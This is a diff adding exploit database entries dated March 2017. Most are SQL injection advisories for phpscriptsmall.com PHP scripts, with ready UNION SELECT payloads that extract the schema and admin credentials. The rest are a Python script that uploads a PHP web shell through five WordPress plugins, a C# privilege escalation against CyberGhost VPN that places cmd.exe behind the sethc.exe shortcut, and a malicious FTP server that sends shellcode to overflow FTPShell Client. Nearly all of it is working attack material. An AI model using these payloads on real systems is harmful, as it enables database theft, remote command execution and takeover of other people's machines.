 # -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,/*!50000concat*/(userid,0x3a,password),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+adminlogin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41526.txt
+++ b/platforms/php/webapps/41526.txt
@ -0,0 +1,25 @@
 # # # # # 
 # Exploit Title: MLM Binary Plan Script v2.0.5 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/mlm-binary-plan-script/
 # Demo: http://74.124.215.220/~binamlm/
 # Version: 2.0.5
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/testimonials_read.php?tid=[SQL]
 # For example;
 # -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8-- -
 # mlm_admin :admin_id
 # mlm_admin :admin_username
 # mlm_admin :admin_password
 # mlm_admin :admin_status
 # -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),5,6,7,8+from+mlm_admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41527.txt
+++ b/platforms/php/webapps/41527.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: MLM Forced Matrix v2.0.7 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/mlm-forced-matrix/
 # Demo: http://74.124.215.220/~forctrix/
 # Version: 2.0.7
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_detail.php?newid=[SQL]
 # http://localhost/[PATH]/event_detail.php?eventid=[SQL]
 # For example;
 # -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
 # mlm_admin :admin_id
 # mlm_admin :admin_username
 # mlm_admin :admin_password
 # mlm_admin :admin_status
 # -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
 # -13'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41528.txt
+++ b/platforms/php/webapps/41528.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: MLM Forex Market Plan Script v2.0.1 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
 # Demo: http://74.124.215.220/~forexmlm/
 # Version: 2.0.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_detail.php?newid=[SQL]
 # http://localhost/[PATH]/event_detail.php?eventid=[SQL]
 # For example;
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
 # mlm_admin :admin_id
 # mlm_admin :admin_username
 # mlm_admin :admin_password
 # mlm_admin :admin_status
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41529.txt
+++ b/platforms/php/webapps/41529.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: MLM Membership Plan Script v2.0.5 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/mlm-membership-plan-script/
 # Demo: http://74.124.215.220/~membipmlm/
 # Version: 2.0.5
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_detail.php?newid=[SQL]
 # http://localhost/[PATH]/event_detail.php?eventid=[SQL]
 # For example;
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
 # mlm_admin :admin_id
 # mlm_admin :admin_username
 # mlm_admin :admin_password
 # mlm_admin :admin_status
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
 # -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41530.txt
+++ b/platforms/php/webapps/41530.txt
@ -0,0 +1,17 @@
 # # # # # 
 # Exploit Title: Multireligion Responsive Matrimonial Script v4.7.1 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
 # Demo: http://74.124.215.220/~matridemo/multi-religion/
 # Version: 4.7.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/search-smart-result.php?cityse=Smart+Search&gender=Male&subcaste=[SQL]&diet=[SQL]&smoke=[SQL]&drink=[SQL]&body_type=[SQL]&familyvalue=[SQL]&familystatus=[SQL]&asubmit=SEARCH
 # # # # #
--- a/platforms/php/webapps/41531.txt
+++ b/platforms/php/webapps/41531.txt
@ -0,0 +1,28 @@
 # # # # # 
 # Exploit Title: Network Community Script v3.0.2 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/network-community/
 # Demo: http://socialcommunityscript.com/products/business_network/
 # Version: 3.0.2
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/refer_job_view.php?jview=[SQL]
 # For example;
 # -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23--+-
 # admin :admin_id
 # admin :admin_name
 # admin :username
 # admin :adminpassword
 # admin :email
 # -1'+/*!50000union*/+select+1,2,3,4,5,6,/*!50000ConCat(*/username,/*!50000char*/(58),adminpassword),8,9,10,11,12,13,14,15,16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23+/*!50000from*/+admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41532.txt
+++ b/platforms/php/webapps/41532.txt
@ -0,0 +1,28 @@
 # # # # # 
 # Exploit Title: PHP B2B Script v3.05 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/php-b2b-script/
 # Demo: http://readymadeb2bscript.com/product/basic/
 # Version: 3.05
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/companyinfo.php?id=[SQL]
 # http://localhost/[PATH]/latest_selling_leads_details.php?bid=[SQL]
 # http://localhost/[PATH]/company_profile.php?id=[SQL]
 # For example;
 # -92'+/*!50000union*/+select+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24--+-
 # admin :username
 # admin :password
 # admin_login :id
 # admin_login :username
 # admin_login :password
 # -92'+/*!50000union*/+select+1,2,3,4,5,6,7,/*!50000ConCat(*/username,/*!50000char*/(58),password),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24+from+admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41533.txt
+++ b/platforms/php/webapps/41533.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/
 # Demo: http://74.124.215.220/~responsivematri/
 # Version: 4.0.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/success_story.php?detail=[SQL]
 # http://localhost/[PATH]/search-results.php?gender=[SQL]Male&age_from=[SQL]&age_to=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&mothertongue=[SQL]&country=[SQL]&education=[SQL]&Submit=search
 # For example;
 # -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14,15,16,17,18,19--+-
 # adminlogin :admin_id
 # adminlogin :admin_username
 # adminlogin :admin_password
 # adminlogin :admin_email
 # adminlogin :admin_usertype
 # -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,/*!50000ConCat(*/admin_username,/*!50000char*/(58),admin_password),11,12,13,14,15,16,17,18,19+from+adminlogin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41534.txt
+++ b/platforms/php/webapps/41534.txt
@ -0,0 +1,26 @@
 # # # # # 
 # Exploit Title: Schools Alert Management Script v2.01 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/schools-alert-management-system/
 # Demo: http://www.schoolcollageerp.com/schoolalert/
 # Version: 2.01
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/view_school_list.php?list_id=[SQL]
 # For example;
 # -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),14,15--+-
 # admin :Id
 # admin :AdminName
 # admin :AdminPass
 # admin :AdminEmail
 # admin :CreatedDate
 # -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,/*!50000ConCat(*/AdminName,/*!50000char*/(58),AdminPass),14,15+from+admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41535.txt
+++ b/platforms/php/webapps/41535.txt
@ -0,0 +1,21 @@
 # # # # # 
 # Exploit Title: Select Your College Script v2.01 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/select-your-college-script/
 # Demo: http://schoolcollageerp.com/selectyourcollege/
 # Version: 2.01
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/searchresult.php?institute=[SQL]
 # http://localhost/[PATH]/searchresult.php?namesearch&name=[SQL]
 # http://localhost/[PATH]/searchcourse.php?categoryid=[SQL]
 # http://localhost/[PATH]/collegedetails.php?id=[SQL]
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41536.txt
+++ b/platforms/php/webapps/41536.txt
@ -0,0 +1,22 @@
 # # # # # 
 # Exploit Title: Social Network Script v3.01 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/social-network-script/
 # Demo: http://myeliteprofile.com/
 # Version: 3.01
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/[SQL]
 # http://localhost/scrapbook.php?id=[SQL
 # http://localhost/profile_social.php?id=[SQL
 # http://localhost/my_bookmark.php?id=[SQL
 # http://localhost/profile_social.php?mode=addbookmark&id=[SQL
 # Etc... Etc...
 # # # # #
--- a/platforms/php/webapps/41539.txt
+++ b/platforms/php/webapps/41539.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Website Broker Script v3.02 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/website-broker-script/
 # Demo: http://www.officialwebsiteforsale.com/official/
 # Version: 3.02
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/website_details_view.php?view=[SQL]
 # For example;
 # -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+-
 # admin_login :id
 # admin_login :userid
 # admin_login :password
 # admin_users :user_id
 # admin_users :username
 # admin_users :password
 # -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41540.py
+++ b/platforms/php/webapps/41540.py
@ -0,0 +1,58 @@
 import requests
 import random
 import string
 print "---------------------------------------------------------------------"
 print "Multiple  Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
 print "---------------------------------------------------------------------"
 victim = raw_input("Please Enter victim host e.g. http://example.com: ")
 plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
 if plug_choice=="1":
 	plugin="zen-mobile-app-native"
 elif plug_choice=="2":
 	plugin="webapp-builder"
 elif plug_choice=="3":
 	plugin="wp2android-turn-wp-site-into-android-app"
 elif plug_choice=="4":
 	plugin="mobile-app-builder-by-wappress"
 elif plug_choice=="5":
 	plugin="mobile-friendly-app-builder-by-easytouch"
 else:
 	print "Invalid Plugin choice, I will now exit"
 	quit()	
 slug = "/wp-content/plugins/"+plugin+"/server/images.php"
 target=victim+slug
 def definShell(size=6, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 shellName= definShell()+".php"
 def checkExistence():
 	litmusTest = requests.get(target)
 	litmusState = litmusTest.status_code
 	if litmusState == 200:
 		print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
 		exploit()
 	else:
 		print "Target has a funny code & might not be vulnerable, I will now exit\n"
 		quit()
 def exploit():
 	print "\nGenerating Payload: "+shellName+"\n"
 	myShell = {'file': (shellName, '<?php echo system($_GET[\'alien\']); ?>')}
 	shellEmUp = requests.post(target, files=myShell)
 	respShell = shellEmUp.text
 	cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
 	shellLoc = cleanURL.replace(" ", "")
 	print "Confirming shell upload by printing current user\n"
 	shellTest=requests.get(shellLoc+"?alien=whoami")
 	webserverUser=shellTest.text
 	if webserverUser == "":
 		print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
 		quit()
 	else:
 		print "The current webserver user is: "+webserverUser+"\n"
 		print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
 		quit()
 if __name__ == "__main__":
 	checkExistence()
--- a/platforms/windows/local/41538.cs
+++ b/platforms/windows/local/41538.cs
@ -0,0 +1,38 @@
 # Exploit CyberGhost 6.0.4.2205 Privilege Escalation
 # Date: 06.03.2017
 # Software Link: http://www.cyberghostvpn.com/
 # Exploit Author: Kacper Szurek
 # Contact: https://twitter.com/KacperSzurek
 # Website: https://security.szurek.pl/
 # Category: local
 1. Description
 `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.
 https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html
 2. Proof of Concept
 using System;
 using CyberGhost.Communication;
 namespace cyber
 {
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
 }
--- a/platforms/windows/remote/41511.py
+++ b/platforms/windows/remote/41511.py
@ -0,0 +1,68 @@
 # Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
 # Date: 2017-03-04
 # Exploit Author: Peter Baris
 # Vendor Homepage: http://www.saptech-erp.com.au
 # Software Link: http://www.ftpshell.com/downloadclient.htm
 # Version: Windows Server 2008 R2 x64
 # Tested on: Windows Server 2008 R2 Standard x64
 # CVE: CVE-2017-6465
 # 2017-03-04: Software vendor notified
 # 2017-03-06: No reply
 # 2017-03-06: Publishing
 import socket
 import sys
 shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
 "\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
 "\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
 "\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
 "\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
 "\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
 "\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
 "\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
 "\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
 "\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
 "\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
 "\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
 "\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
 "\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
 "\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
 "\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
 "\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
 "\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
 "\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
 "\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
 "\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
 "\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
 "\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
 "\x79\x47\xd8\xc8\x7a\x42")
 port = 21
 try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", port))
        s.listen(5)
        print("[i] FTP server started on port: "+str(port)+"\r\n")
 except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
 # 004b95dc in ftpshell.exe PUSH ESI ; RETN
 eip = "\xdc\x95\x4b"
 nops = "\x90"*8 
 junk = "A"*(400-len(nops)-len(shell))
 buffer = nops + shell + junk + eip
 while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')